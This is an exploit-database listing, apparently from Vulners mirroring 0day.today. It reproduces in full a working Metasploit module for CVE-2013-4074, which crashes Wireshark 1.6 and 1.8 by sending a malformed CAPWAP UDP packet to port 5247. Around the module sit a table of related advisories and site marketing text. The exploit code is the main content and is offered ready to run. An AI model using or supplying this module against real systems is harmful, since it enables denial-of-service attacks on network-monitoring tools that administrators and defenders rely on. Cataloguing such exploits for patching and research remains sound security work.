Lucene search
K

Wireshark CAPWAP Dissector - Denial of Service (msf)

🗓️ 01 Jun 2014 00:00:00Reported by j0sm1Type 
zdt
 zdt
🔗 0day.today👁 41 Views

This module crashes Wireshark by injecting a malicious UDP packet through the Wireshark CAPWAP dissector

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-4074
28 May 201400:00
circl
CVE
CVE-2013-4074
9 Jun 201321:00
cve
Cvelist
CVE-2013-4074
9 Jun 201321:00
cvelist
Debian
[SECURITY] [DSA 2709-1] wireshark security update
17 Jun 201316:52
debian
Debian CVE
CVE-2013-4074
9 Jun 201321:00
debiancve
Tenable Nessus
Debian DSA-2709-1 : wireshark - several vulnerabilities
18 Jun 201300:00
nessus
Tenable Nessus
F5 Networks BIG-IP : Multiple Wireshark vulnerabilities (K15868)
28 Nov 201400:00
nessus
Tenable Nessus
Fedora 20 : wireshark-1.10.2-7.fc20 (2013-17627)
3 Oct 201300:00
nessus
Tenable Nessus
Fedora 18 : wireshark-1.10.2-4.fc18 (2013-17635)
20 Dec 201300:00
nessus
Tenable Nessus
Fedora 19 : wireshark-1.10.2-6.fc19 (2013-17661)
28 Sep 201300:00
nessus
Rows per page
#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Auxiliary
 
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wireshark CAPWAP Dissector DoS',
      'Description'    => %q{
        This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0
        to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an
        incomplete packet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Laurent Butti', # Discovery vulnerability
          'j0sm1'  # Auxiliary msf module
        ],
      'References'     =>
        [
          ['CVE', '2013-4074'],
          ['OSVDB', '94091'],
          ['BID', '60500']
        ],
      'DisclosureDate' => 'Apr 28 2014'))
 
    # Protocol capwap needs port 5247 to trigger the dissector in wireshark
    register_options([ Opt::RPORT(5247) ], self.class)
  end
 
  def run
 
    connect_udp
 
    # We send a packet incomplete to crash dissector
    print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...")
    # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then
    # the dissector crash
    # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt
    # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000
    buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15)
    udp_sock.put(buf)
 
    disconnect_udp
 
  end
end

#  0day.today [2018-03-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation